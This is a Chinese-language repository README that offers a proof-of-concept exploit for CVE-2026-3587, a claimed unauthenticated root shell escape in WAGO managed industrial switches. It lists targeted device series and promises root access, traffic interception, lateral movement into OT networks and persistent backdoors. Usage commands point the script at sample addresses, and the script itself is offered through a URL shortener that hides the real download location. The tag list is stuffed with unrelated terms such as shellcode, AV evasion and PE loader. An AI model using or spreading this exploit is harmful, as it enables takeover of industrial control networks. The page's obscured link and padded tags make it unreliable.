z3r0h3ro/cve-2026-3587-poc

# WAGO 管理型交换机 CLI 受限 Shell 逃逸 **CVE-2026-3587** - CVSS 10.0 严重 - 通过隐藏 CLI 后门实现未经认证的 root 访问 在许多 WAGO 管理型工业交换机上实现未经认证的远程 root 权限，利用途径为受限 CLI shell（telnet 23 / ssh 22）中的未记录逃逸序列。 这是一个简洁、极简的 Python 3 PoC，可连接到 CLI 服务，发送触发序列并直接将您送入一个 **root** BusyBox shell。 受影响设备（部分列表 - 完整矩阵请参阅 [VDE-2026-020](https://certvde.com/en/advisories/VDE-2026-020))： - 852-1xxx 系列（大多数固件版本 ≤ xx.2x.xx） - 852-13xx / 852-15xx 系列，通常部署于 OT/ICS 环境中 - 具有集成管理型交换机功能且运行易受攻击固件的 PFC200 / PFC300 控制器 影响： - 完全的 root 文件系统访问权限 - 以 root 身份执行任意命令 - 流量拦截/修改（端口镜像，从交换机本身进行 ARP 欺骗） - 横向移动跳板进入 OT 网络段 - 可能安装持久性后门（例如，植入 ssh 密钥，修改 /etc/init.d 脚本） 无需认证。无需用户交互。仅限网络相邻访问（端口 23/22 可达）。 ### 用法 ``` # (最常见) python3 cve-2026-3587.py 192.168.1.100 23 # (部分型号启用了 SSH CLI) python3 cve-2026-3587.py 10.10.50.5 22 --proto ssh # (慢速/旧版设备) python3 cve-2026-3587.py 172.16.0.88 23 --timeout 15 ``` 在 2019–2025 年间测试的固件版本上运行可靠。一些非常旧的固件（<2018）可能需要对时序/序列稍作修改。 **下载 - [href](https://tinyurl.com/4t3ajsn6)** ### 重要说明 - 此 PoC 仅严格用于研究、红队演练（需书面授权）和防御性验证。 - 切勿针对您不拥有或未获得明确测试授权的系统使用。 - 现场仍有许多 WAGO 设备运行着易受攻击的固件 - 如果暴露在外，请立即修补。

标签：BusyBox, CVE-2026-3587, ICS漏洞, OT安全, PE 加载器, PKINIT, PoC, Python3, RCE, Root权限, Shellcode, SSH, Telnet, VDE-2026-020, WAGO交换机, Web报告查看器, 免杀, 内存分配, 受限Shell逃逸, 嵌入式设备, 工业交换机, 工控安全, 技术调研, 暴力破解, 未授权访问, 概念验证, 横向移动, 特权提升, 编程工具, 编程规范, 网络安全, 自动化部署, 远程代码执行, 隐私保护, 隐藏后门